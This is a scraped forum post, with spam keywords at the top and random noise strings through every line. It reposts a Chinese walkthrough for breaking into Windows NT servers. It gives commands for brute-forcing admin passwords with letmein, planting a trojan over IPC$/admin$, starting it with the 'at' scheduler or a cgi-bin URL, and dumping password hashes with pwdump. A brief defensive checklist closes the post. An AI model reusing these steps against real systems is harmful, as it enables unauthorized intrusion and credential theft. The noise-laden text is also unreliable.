中文字幕精品亚洲无线码,99视频在线观看精品29,亚州十八禁免费不卡在线视颖,亚洲香蕉网久久综合影视

<sub id="xxpls"></sub><sub id="xxpls"></sub>
  • <listing id="xxpls"><u id="xxpls"></u></listing>
    

    <sub id="xxpls"></sub>
  • <sub id="xxpls"><ol id="xxpls"></ol></sub>
    

    <style id="xxpls"><u id="xxpls"></u></style>
  • 

    汶上信息港
    
標(biāo)題: 遠(yuǎn)程入侵NT ----spp(低音炮) [打印本頁(yè)]
    

    
作者: 雜七雜八    時(shí)間: 2011-1-12 16:31
    
標(biāo)題: 遠(yuǎn)程入侵NT ----spp(低音炮)
    看了篇文章介紹使用netbus 或 netspy 遠(yuǎn)程入侵nt系統(tǒng),感覺(jué)真是。。看來(lái)nt系統(tǒng)的共享機(jī)制如果不配合火墻使用,SMB會(huì)給你造成很大麻煩。。 連小小 只的木馬都可以讓nt管理員頭大。 
    
  B& K  O3 p& Y" J: [- Q    其攻擊過(guò)程如下: 
    
+ \0 }$ C/ R7 ~% T  b$ g7 S2 a8 \1、使用掃描工具查找NT主機(jī)       
    
# b$ L2 M* {, `' _! t( C% g2 、確定攻擊目標(biāo)后,使用letmein 對(duì)目標(biāo)主機(jī)進(jìn)行攻擊, 如: 
    
. ?- _: y# |0 h- Gletmein file://x.x.x.x/ -all -g mypwd (對(duì)\\x.x.x.x上所有用戶(hù)攻擊) 6 E; {( \9 J  U
    
letmein file://x.x.x.x/ -admin -g mypwd (對(duì)\\x.x.x.x上管理員攻擊) 
    
  h( j' b1 ~# eletmein file://x.x.x.x/ -all -d mypwd (顯示\\x.x.x.x上所有用戶(hù)) 0 E0 H, E! M# `, K5 a1 P5 Z
    
注:- 確定目標(biāo)后,收集目標(biāo)信息并嘗試取得非法資源 ( w5 ]+ y8 Z. n+ u; d
    
3、當(dāng)letmein 獲取相關(guān)管理員權(quán)限后,使用ms提供的合法命令: 
    
9 B# L: c/ y! b4 w) |net use \\x.x.x.x\ipc$ "pass"/user:"user" 連接遠(yuǎn)程資源并將木馬拷入遠(yuǎn)程 
    
+ N( j# \; ]5 b+ i" [- zcopy x:\netserver.exe \\x.x.x.x\admin$\system32 2 _2 |; u) V0 y2 `+ B1 }' H
    
4、使用合法ms命令遠(yuǎn)程啟動(dòng)木馬服務(wù): 
    
+ A- K$ \- ~) W( b4 K+ m3 Onetsvc \\x.x.x.x schedule /start at \\x.x.x.x hh:mm netserver.exe /port:yourport /nomsg 1 u" c7 P# @1 [8 R1 A2 S0 G4 D
    
* F) A! N, v8 Z8 X: @* a, Q' v" p
    
   該方法有其巧妙之處。。利用nt的任務(wù)計(jì)劃管理,在特定時(shí)候啟動(dòng)木馬服務(wù) 
    
. g: J, K7 ?- O# t, v- d" A8 m, c+ N( [# R9 u) i/ k5 b
    
   另一種方法: 
    
, ~) {! y  r& d) l. _1 Y   將ntsrver.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄, 如cgi-bin或scripts,然后在瀏覽器鍵入url如: http://x.x.x.x/scripts/ntsrver.exe /port:yourport 或 http://x.x.x.x/cgi-gin/ntsrver.exe /port:yourport 木馬服務(wù)將被啟動(dòng), {  z; o1 `' g1 x8 N0 M/ c5 d
    
- A* ]" C# y3 o7 ~8 @7 B# N
    
    到此,該次攻擊可以算成功了,遠(yuǎn)程資源已在別人控制下。 4 P" Q2 |$ _/ Q5 F( k. @
    
    如果在遠(yuǎn)程使用app redirect 啟動(dòng)一個(gè)cmd.exe到特定端口 , 那么你可以telnet 到該端口,更方便使用該遠(yuǎn)程資源 。比如:使用pwdump 將遠(yuǎn)程nt上所有用戶(hù)和密碼 dump成文件,回傳本地,使用其他工具如l0phtcrack來(lái)運(yùn)算。 分析該次攻擊的整體過(guò)程,不難看出,關(guān)鍵步驟是letmein取得admin權(quán)限,但是很不幸,就目前廈門(mén)(有些是省內(nèi))的nt服務(wù)器管理員而言,密碼對(duì)letmein只是多花幾分鐘而已。我對(duì)某些大的公共平臺(tái)服務(wù)器進(jìn)行掃描的結(jié)果,除了solaris和linux系統(tǒng)之外,其余的nt被letmein猜中率有75%以上。而且在這些被進(jìn)入的機(jī)器上,SMB都有在tcp/ip上 跑,有兩臺(tái)有配備火墻,但是沒(méi)有封閉對(duì)外137-139口。 
    
2 q) i$ k' X+ k7 `: o1 e1 N6 ]( _8 I& x5 R  R
    
     對(duì)策: 
    
! g4 [# W4 M) z6 X/ s4 J4 j" q8 B" c1、還是老話(huà),密碼的選擇問(wèn)題,使用向..@2KjsfiM7v!09..這樣的密碼會(huì)讓任何使用 暴力法計(jì)算的機(jī)器算到cpu燒掉。 : f$ q. J2 L5 ?: z/ a6 X4 j
    
2、nt網(wǎng)絡(luò)的適當(dāng)配置,不要在對(duì)外的nc綁定共享服務(wù)是個(gè)好習(xí)慣,特別是tcp/ip協(xié)議。 
    
( x; R0 S% w' d  z3、防火墻的配置,屏蔽一切不需要的服務(wù)端口,象netebui在tcp/ip上的137-139口,開(kāi)這些口只會(huì)使你的系統(tǒng)處于危險(xiǎn)的處境,如果非要在遠(yuǎn)程使用這些口的服務(wù),建議使用其他軟件來(lái)代替。 * |. {) D" y+ B3 j9 U
    
4、及時(shí)檢查日記和監(jiān)控服務(wù)的運(yùn)行,定時(shí)對(duì)文件系統(tǒng)的權(quán)限受托關(guān)系進(jìn)行檢查。 * N5 r2 A% _% G" k
    
5、管理人員素質(zhì)的提高,安全風(fēng)險(xiǎn)意思加強(qiáng)無(wú)疑對(duì)你管理的系統(tǒng)有很多好處。 -- SPP 10Hz的低頻 你聽(tīng)不到的聲音卻無(wú)時(shí)不刻在影響著你 。* b, s7 q0 Z  ^, N" i
    





    

    

    歡迎光臨 汶上信息港 (http://huihexinxi.com.cn/)

Powered by Discuz! X3.5